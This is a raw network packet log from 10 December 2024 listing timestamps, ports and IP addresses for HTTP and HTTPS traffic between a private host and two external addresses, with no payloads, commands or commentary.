Dec 10, 2024 11:11:44.715058088 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.715132952 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.716010094 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.716103077 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.716136932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.716176987 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.717156887 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.717205048 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.717334032 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.717370987 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.718233109 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.718277931 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.718329906 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.718513012 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.719415903 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.719463110 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.719497919 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.719527960 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.720520973 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.720588923 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.720619917 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.720665932 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.721560001 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.721602917 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.721669912 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.721775055 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.722706079 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.722749949 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.722830057 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.722870111 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.723809004 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.723861933 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.723897934 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.723943949 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.724935055 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.724971056 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.725044966 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.725083113 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.726053953 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.726156950 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.726201057 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.743959904 CET	443	49935	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:44.744064093 CET	443	49935	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:44.744122028 CET	49935	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.747914076 CET	49935	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.747932911 CET	443	49935	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:44.747946024 CET	49935	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.747951031 CET	443	49935	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:44.841043949 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841098070 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.841180086 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841320992 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.841456890 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841469049 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841494083 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.841512918 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.841732025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841789961 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.841943979 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.841984034 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.842847109 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.842906952 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.863876104 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.863940001 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.864012003 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.864469051 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.864512920 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.864517927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.864557028 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.865619898 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.865674973 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.865829945 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.865869999 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.866734028 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.866748095 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.866780043 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.866795063 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.867806911 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.867854118 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.867919922 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.867957115 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.868993998 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.869034052 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.869077921 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.869219065 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.870069027 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.870120049 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.870194912 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.870229006 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.871330023 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.871431112 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.871433020 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.871479034 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.872440100 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.872509003 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.872673988 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.872714996 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.873456001 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.873497009 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.873655081 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.873689890 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.874573946 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.874670029 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.874713898 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.875674009 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.875785112 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.875837088 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.876811981 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.876877069 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.876920938 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.877866983 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.877903938 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.878050089 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.878130913 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.879086971 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.879133940 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.879159927 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.879333019 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.880129099 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.880182028 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.880220890 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.880314112 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.881239891 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.881287098 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.881412029 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.881449938 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.882345915 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.882412910 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.882462978 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.883465052 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.883584976 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.883657932 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.884605885 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.884800911 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.884844065 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.885719061 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.885781050 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.885818958 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.886065006 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.886828899 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.886887074 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.887052059 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.887100935 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.887948990 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.888070107 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.888123989 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.888154984 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.889070034 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.889117002 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.889161110 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.889266968 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.890223980 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.890324116 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.890348911 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.890440941 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.891324043 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.891376972 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.891422033 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.892429113 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.892481089 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.892499924 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.893451929 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.896684885 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.896697044 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.896707058 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.896713018 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.896742105 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.896800041 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.896823883 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.896867990 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.896996021 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.897046089 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.898106098 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.898168087 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.898284912 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.898422956 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.899152994 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.899199963 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.899336100 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.899372101 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.900284052 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.900429964 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.900437117 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.900470018 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.901412010 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.901463985 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.901549101 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.901797056 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.902688980 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.902700901 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.902751923 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.902769089 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.903618097 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.903790951 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.903837919 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.904778004 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.904932976 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.904957056 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.905070066 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.905941010 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.905992985 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.906116009 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.906178951 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.907289982 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.907301903 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.907326937 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.907351971 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.908545971 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.908556938 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.908590078 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.908607960 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.909359932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.909408092 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.909524918 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.909569979 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.910356045 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.910394907 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.910532951 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.910579920 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.911108971 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.911125898 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.911151886 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.911441088 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.911483049 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.911546946 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.911679029 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.912599087 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.912645102 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.912678003 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.912723064 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.913779974 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.913862944 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.913922071 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.914814949 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.914860010 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.914957047 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.915011883 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.916013956 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.916032076 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.916057110 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.916079044 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.919996977 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.920008898 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.920021057 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.920030117 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:44.920049906 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.920097113 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:44.939503908 CET	49948	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.939552069 CET	443	49948	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:44.939620018 CET	49948	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.950021029 CET	49948	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:44.950041056 CET	443	49948	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:45.032459021 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.032473087 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.032510996 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.032547951 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.032903910 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.033060074 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.033103943 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.034085989 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.034128904 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.034148932 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.034204960 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.035072088 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.035119057 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.056406975 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.056427002 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.056463003 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.056488037 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.056700945 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.056768894 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.056826115 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.056869030 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.057790995 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.057842970 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.057885885 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.057930946 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.059020996 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.059072971 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.059135914 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.059178114 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.060029030 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.060085058 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.060220003 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.060266972 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.061166048 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.061233997 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.061304092 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.061770916 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.062205076 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.062344074 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.062410116 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.063364983 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.063445091 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.063488007 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.063571930 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.064501047 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.064568043 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.064604998 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.064717054 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.065583944 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.065638065 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.065798044 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.065923929 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.066705942 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.066840887 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.066911936 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.067822933 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.067907095 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.067975998 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.068923950 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.068981886 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.069030046 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.070091963 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.070152998 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.070173025 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.070391893 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.071208000 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.071345091 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.071346045 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.071381092 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.072273016 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.072376013 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.072424889 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.073426962 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.073623896 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.073653936 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.073666096 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.074567080 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.074615002 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.074637890 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.074701071 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.075747013 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.075805902 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.075848103 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.075890064 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.076827049 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.076873064 CET	49937	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:45.076909065 CET	80	49937	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:45.077277899 CET	49937	80	192.168.2.5	185.215.113.16
